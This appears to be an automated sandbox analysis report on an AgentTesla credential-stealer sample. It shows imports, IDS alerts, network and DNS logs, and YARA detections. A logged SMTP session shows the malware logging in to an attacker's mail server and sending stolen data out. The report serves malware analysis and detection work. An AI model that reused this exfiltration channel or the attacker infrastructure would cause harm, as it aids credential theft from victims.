                                        RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                        DLLImport
                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                        USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                        GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                        OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishGreat Britain
                                        EnglishUnited States
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-08T14:08:10.937050+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.44973115.235.118.15587TCP
                                        2024-10-08T14:08:10.937050+02002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.44973115.235.118.15587TCP
                                        2024-10-08T14:08:10.937050+02002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.44973115.235.118.15587TCP
                                        2024-10-08T14:08:14.849412+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.44973115.235.118.15587TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 8, 2024 14:08:12.168889046 CEST4973080192.168.2.4208.95.112.1
                                        Oct 8, 2024 14:08:12.173913956 CEST8049730208.95.112.1192.168.2.4
                                        Oct 8, 2024 14:08:12.174000978 CEST4973080192.168.2.4208.95.112.1
                                        Oct 8, 2024 14:08:12.175093889 CEST4973080192.168.2.4208.95.112.1
                                        Oct 8, 2024 14:08:12.180072069 CEST8049730208.95.112.1192.168.2.4
                                        Oct 8, 2024 14:08:12.644345999 CEST8049730208.95.112.1192.168.2.4
                                        Oct 8, 2024 14:08:12.686897039 CEST4973080192.168.2.4208.95.112.1
                                        Oct 8, 2024 14:08:13.288832903 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:13.294105053 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:13.294187069 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:13.811090946 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:13.811319113 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:13.816282988 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:13.964936018 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:13.965919018 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:13.970976114 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.077780962 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.078037977 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:14.082895041 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.192472935 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.192666054 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:14.197962046 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.295485020 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.295707941 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:14.300683022 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.479789972 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.480189085 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:14.485078096 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.823102951 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.823307037 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.823451042 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:14.849318027 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:14.849411964 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:14.849411964 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:14.849411964 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:14.854460001 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.854489088 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.854513884 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.854540110 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:14.982587099 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:08:15.031200886 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:08:47.641906977 CEST8049730208.95.112.1192.168.2.4
                                        Oct 8, 2024 14:08:47.641976118 CEST4973080192.168.2.4208.95.112.1
                                        Oct 8, 2024 14:09:02.952832937 CEST4973080192.168.2.4208.95.112.1
                                        Oct 8, 2024 14:09:02.957860947 CEST8049730208.95.112.1192.168.2.4
                                        Oct 8, 2024 14:09:52.968523979 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:09:52.973419905 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:09:53.273829937 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:09:53.273940086 CEST5874973115.235.118.15192.168.2.4
                                        Oct 8, 2024 14:09:53.274007082 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:09:53.274053097 CEST49731587192.168.2.415.235.118.15
                                        Oct 8, 2024 14:09:53.278877974 CEST5874973115.235.118.15192.168.2.4
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 8, 2024 14:08:12.150456905 CEST5701953192.168.2.41.1.1.1
                                        Oct 8, 2024 14:08:12.157622099 CEST53570191.1.1.1192.168.2.4
                                        Oct 8, 2024 14:08:12.947326899 CEST6403553192.168.2.41.1.1.1
                                        Oct 8, 2024 14:08:13.287317038 CEST53640351.1.1.1192.168.2.4
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 8, 2024 14:08:12.150456905 CEST192.168.2.41.1.1.10x9fbcStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                        Oct 8, 2024 14:08:12.947326899 CEST192.168.2.41.1.1.10x5b90Standard query (0)mail.flujoauditorias.clA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 8, 2024 14:08:12.157622099 CEST1.1.1.1192.168.2.40x9fbcNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                        Oct 8, 2024 14:08:13.287317038 CEST1.1.1.1192.168.2.40x5b90No error (0)mail.flujoauditorias.clflujoauditorias.clCNAME (Canonical name)IN (0x0001)false
                                        Oct 8, 2024 14:08:13.287317038 CEST1.1.1.1192.168.2.40x5b90No error (0)flujoauditorias.cl15.235.118.15A (IP address)IN (0x0001)false
                                        • ip-api.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449730208.95.112.1806988C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 14:08:12.175093889 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Oct 8, 2024 14:08:12.644345999 CEST175INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 12:08:12 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 6
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 60
                                        X-Rl: 44
                                        Data Raw: 66 61 6c 73 65 0a
                                        Data Ascii: false


                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Oct 8, 2024 14:08:13.811090946 CEST5874973115.235.118.15192.168.2.4220-s350.v2nets.com ESMTP Exim 4.97.1 #2 Tue, 08 Oct 2024 09:08:13 -0300
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Oct 8, 2024 14:08:13.811319113 CEST49731587192.168.2.415.235.118.15EHLO 048707
                                        Oct 8, 2024 14:08:13.964936018 CEST5874973115.235.118.15192.168.2.4250-s350.v2nets.com Hello 048707 [8.46.123.33]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPECONNECT
                                        250-AUTH PLAIN LOGIN
                                        250-STARTTLS
                                        250 HELP
                                        Oct 8, 2024 14:08:13.965919018 CEST49731587192.168.2.415.235.118.15AUTH login bmVkdWZpbGUxQGZsdWpvYXVkaXRvcmlhcy5jbA==
                                        Oct 8, 2024 14:08:14.077780962 CEST5874973115.235.118.15192.168.2.4334 UGFzc3dvcmQ6
                                        Oct 8, 2024 14:08:14.192472935 CEST5874973115.235.118.15192.168.2.4235 Authentication succeeded
                                        Oct 8, 2024 14:08:14.192666054 CEST49731587192.168.2.415.235.118.15MAIL FROM:<nedufile1@flujoauditorias.cl>
                                        Oct 8, 2024 14:08:14.295485020 CEST5874973115.235.118.15192.168.2.4250 OK
                                        Oct 8, 2024 14:08:14.295707941 CEST49731587192.168.2.415.235.118.15RCPT TO:<nedufile2@flujoauditorias.cl>
                                        Oct 8, 2024 14:08:14.479789972 CEST5874973115.235.118.15192.168.2.4250 Accepted
                                        Oct 8, 2024 14:08:14.480189085 CEST49731587192.168.2.415.235.118.15DATA
                                        Oct 8, 2024 14:08:14.823102951 CEST5874973115.235.118.15192.168.2.4354 Enter message, ending with "." on a line by itself
                                        Oct 8, 2024 14:08:14.823307037 CEST5874973115.235.118.15192.168.2.4354 Enter message, ending with "." on a line by itself
                                        Oct 8, 2024 14:08:14.849411964 CEST49731587192.168.2.415.235.118.15.
                                        Oct 8, 2024 14:08:14.982587099 CEST5874973115.235.118.15192.168.2.4250 OK id=1sy90g-0000000AwCV-2JIp
                                        Oct 8, 2024 14:09:52.968523979 CEST49731587192.168.2.415.235.118.15QUIT
                                        Oct 8, 2024 14:09:53.273829937 CEST5874973115.235.118.15192.168.2.4221 s350.v2nets.com closing connection

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:08:08:07
                                        Start date:08/10/2024
                                        Path:C:\Users\user\Desktop\uFzZ48M67c.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\uFzZ48M67c.exe"
                                        Imagebase:0x400000
                                        File size:80'740'352 bytes
                                        MD5 hash:A441DB009E52A518A60ACF292302F8B9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.1727585694.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:08:08:10
                                        Start date:08/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\uFzZ48M67c.exe"
                                        Imagebase:0xd40000
                                        File size:45'984 bytes
                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2955848484.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2956839649.0000000003295000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:3.5%
                                          Dynamic/Decrypted Code Coverage:0.4%
                                          Signature Coverage:8.8%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:36
                                          execution_graph 84245 3e823f8 84259 3e80048 84245->84259 84247 3e824ad 84262 3e822e8 84247->84262 84265 3e834d8 GetPEB 84259->84265 84261 3e806d3 84261->84247 84263 3e822f1 Sleep 84262->84263 84264 3e822ff 84263->84264 84266 3e83502 84265->84266 84266->84261 84267 4010e0 84270 401100 84267->84270 84269 4010f8 84271 401113 84270->84271 84272 401120 84271->84272 84273 401184 84271->84273 84274 40114c 84271->84274 84301 401182 84271->84301 84275 40112c DefWindowProcW 84272->84275 84329 401000 Shell_NotifyIconW __setmbcp_nolock 84272->84329 84308 401250 84273->84308 84277 401151 84274->84277 84278 40119d 84274->84278 84275->84269 84281 401219 84277->84281 84282 40115d 84277->84282 84279 4011a3 84278->84279 84280 42afb4 84278->84280 84279->84272 84287 4011b6 KillTimer 84279->84287 84288 4011db SetTimer RegisterWindowMessageW 84279->84288 84324 40f190 10 API calls 84280->84324 84281->84272 84284 401225 84281->84284 84283 401163 84282->84283 84289 42b01d 84282->84289 84290 42afe9 84283->84290 84291 40116c 84283->84291 84340 468b0e 74 API calls __setmbcp_nolock 84284->84340 84323 401000 Shell_NotifyIconW __setmbcp_nolock 84287->84323 84292 401193 84288->84292 84298 401204 CreatePopupMenu 84288->84298 84289->84275 84328 4370f4 52 API calls 84289->84328 84326 40f190 10 API calls 84290->84326 84291->84272 84300 401174 84291->84300 84292->84269 84293 42b04f 84330 40e0c0 84293->84330 84298->84269 84325 45fd57 65 API calls __setmbcp_nolock 84300->84325 84301->84275 84302 42afe4 84302->84292 84303 42b00e 84327 401a50 331 API calls 84303->84327 84304 4011c9 PostQuitMessage 84304->84269 84307 42afdc 84307->84275 84307->84302 84309 401262 __setmbcp_nolock 84308->84309 84310 4012e8 84308->84310 84341 401b80 84309->84341 84310->84292 84312 40128c 84313 4012d1 KillTimer SetTimer 84312->84313 84314 4012bb 84312->84314 84315 4272ec 84312->84315 84313->84310 84318 4012c5 84314->84318 84319 42733f 84314->84319 84316 4272f4 Shell_NotifyIconW 84315->84316 84317 42731a Shell_NotifyIconW 84315->84317 84316->84313 84317->84313 84318->84313 84320 427393 Shell_NotifyIconW 84318->84320 84321 427348 Shell_NotifyIconW 84319->84321 84322 42736e Shell_NotifyIconW 84319->84322 84320->84313 84321->84313 84322->84313 84323->84304 84324->84292 84325->84307 84326->84303 84327->84301 84328->84301 84329->84293 84332 40e0e7 __setmbcp_nolock 84330->84332 84331 40e142 84337 40e184 84331->84337 84439 4341e6 63 API calls __wcsicoll 84331->84439 84332->84331 84333 42729f DestroyIcon 84332->84333 84333->84331 84335 40e1a0 Shell_NotifyIconW 84338 401b80 54 API calls 84335->84338 84336 4272db Shell_NotifyIconW 84337->84335 84337->84336 84339 40e1ba 84338->84339 84339->84301 84340->84302 84342 401b9c 84341->84342 84362 401c7e 84341->84362 84363 4013c0 84342->84363 84345 42722b LoadStringW 84348 427246 84345->84348 84346 401bb9 84368 402160 84346->84368 84382 40e0a0 84348->84382 84349 401bcd 84351 427258 84349->84351 84352 401bda 84349->84352 84386 40d200 52 API calls 2 library calls 84351->84386 84352->84348 84353 401be4 84352->84353 84381 40d200 52 API calls 2 library calls 84353->84381 84356 427267 84357 401bf3 _wcscpy __setmbcp_nolock _wcsncpy 84356->84357 84358 42727b 84356->84358 84361 401c62 Shell_NotifyIconW 84357->84361 84387 40d200 52 API calls 2 library calls 84358->84387 84360 427289 84361->84362 84362->84312 84388 4115d7 84363->84388 84369 426daa 84368->84369 84370 40216b _wcslen 84368->84370 84426 40c600 84369->84426 84373 402180 84370->84373 84374 40219e 84370->84374 84372 426db5 84372->84349 84425 403bd0 52 API calls ctype 84373->84425 84375 4013a0 52 API calls 84374->84375 84377 4021a5 84375->84377 84379 426db7 84377->84379 84380 4115d7 52 API calls 84377->84380 84378 402187 _memmove 84378->84349 84380->84378 84381->84357 84383 40e0b2 84382->84383 84384 40e0a8 84382->84384 84383->84357 84438 403c30 52 API calls _memmove 84384->84438 84386->84356 84387->84360 84390 4115e1 _malloc 84388->84390 84391 4013e4 84390->84391 84395 4115fd std::exception::exception 84390->84395 84402 4135bb 84390->84402 84399 4013a0 84391->84399 84392 41163b 84417 4180af 46 API calls std::exception::operator= 84392->84417 84394 411645 84418 418105 RaiseException 84394->84418 84395->84392 84416 41130a 51 API calls __cinit 84395->84416 84398 411656 84400 4115d7 52 API calls 84399->84400 84401 4013a7 84400->84401 84401->84345 84401->84346 84403 413638 _malloc 84402->84403 84411 4135c9 _malloc 84402->84411 84424 417f77 46 API calls __getptd_noexit 84403->84424 84406 4135f7 RtlAllocateHeap 84406->84411 84415 413630 84406->84415 84408 413624 84422 417f77 46 API calls __getptd_noexit 84408->84422 84411->84406 84411->84408 84412 413622 84411->84412 84413 4135d4 84411->84413 84423 417f77 46 API calls __getptd_noexit 84412->84423 84413->84411 84419 418901 46 API calls __NMSG_WRITE 84413->84419 84420 418752 46 API calls 5 library calls 84413->84420 84421 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84413->84421 84415->84390 84416->84392 84417->84394 84418->84398 84419->84413 84420->84413 84422->84412 84423->84415 84424->84415 84425->84378 84427 40c619 84426->84427 84428 40c60a 84426->84428 84427->84372 84428->84427 84431 4026f0 84428->84431 84430 426d7a _memmove 84430->84372 84432 426873 84431->84432 84433 4026ff 84431->84433 84434 4013a0 52 API calls 84432->84434 84433->84430 84435 42687b 84434->84435 84436 4115d7 52 API calls 84435->84436 84437 42689e _memmove 84436->84437 84437->84430 84438->84383 84439->84337 84440 40bd20 84441 428194 84440->84441 84449 40bd2d 84440->84449 84442 40bd43 84441->84442 84443 4281bc 84441->84443 84445 4281b2 84441->84445 84462 45e987 86 API calls ctype 84443->84462 84461 40b510 VariantClear 84445->84461 84450 40bd37 84449->84450 84463 4531b1 85 API calls 5 library calls 84449->84463 84452 40bd50 84450->84452 84451 4281ba 84453 426cf1 84452->84453 84454 40bd63 84452->84454 84473 44cde9 52 API calls _memmove 84453->84473 84464 40bd80 84454->84464 84457 40bd73 84457->84442 84458 426cfc 84459 40e0a0 52 API calls 84458->84459 84460 426d02 84459->84460 84461->84451 84462->84449 84463->84450 84465 40bd8e 84464->84465 84466 40bdb7 _memmove 84464->84466 84465->84466 84467 40bded 84465->84467 84468 40bdad 84465->84468 84466->84457 84469 4115d7 52 API calls 84467->84469 84474 402f00 84468->84474 84471 40bdf6 84469->84471 84471->84466 84472 4115d7 52 API calls 84471->84472 84472->84466 84473->84458 84475 402f10 84474->84475 84476 402f0c 84474->84476 84477 4115d7 52 API calls 84475->84477 84478 4268c3 84475->84478 84476->84466 84479 402f51 ctype _memmove 84477->84479 84479->84466 84480 425ba2 84485 40e360 84480->84485 84482 425bb4 84501 41130a 51 API calls __cinit 84482->84501 84484 425bbe 84486 4115d7 52 API calls 84485->84486 84487 40e3ec GetModuleFileNameW 84486->84487 84502 413a0e 84487->84502 84489 40e421 _wcsncat 84505 413a9e 84489->84505 84492 4115d7 52 API calls 84493 40e45e _wcscpy 84492->84493 84508 40bc70 84493->84508 84497 40e4a9 84497->84482 84498 401c90 52 API calls 84500 40e4a1 _wcscat _wcslen _wcsncpy 84498->84500 84499 4115d7 52 API calls 84499->84500 84500->84497 84500->84498 84500->84499 84501->84484 84527 413801 84502->84527 84557 419efd 84505->84557 84509 4115d7 52 API calls 84508->84509 84510 40bc98 84509->84510 84511 4115d7 52 API calls 84510->84511 84512 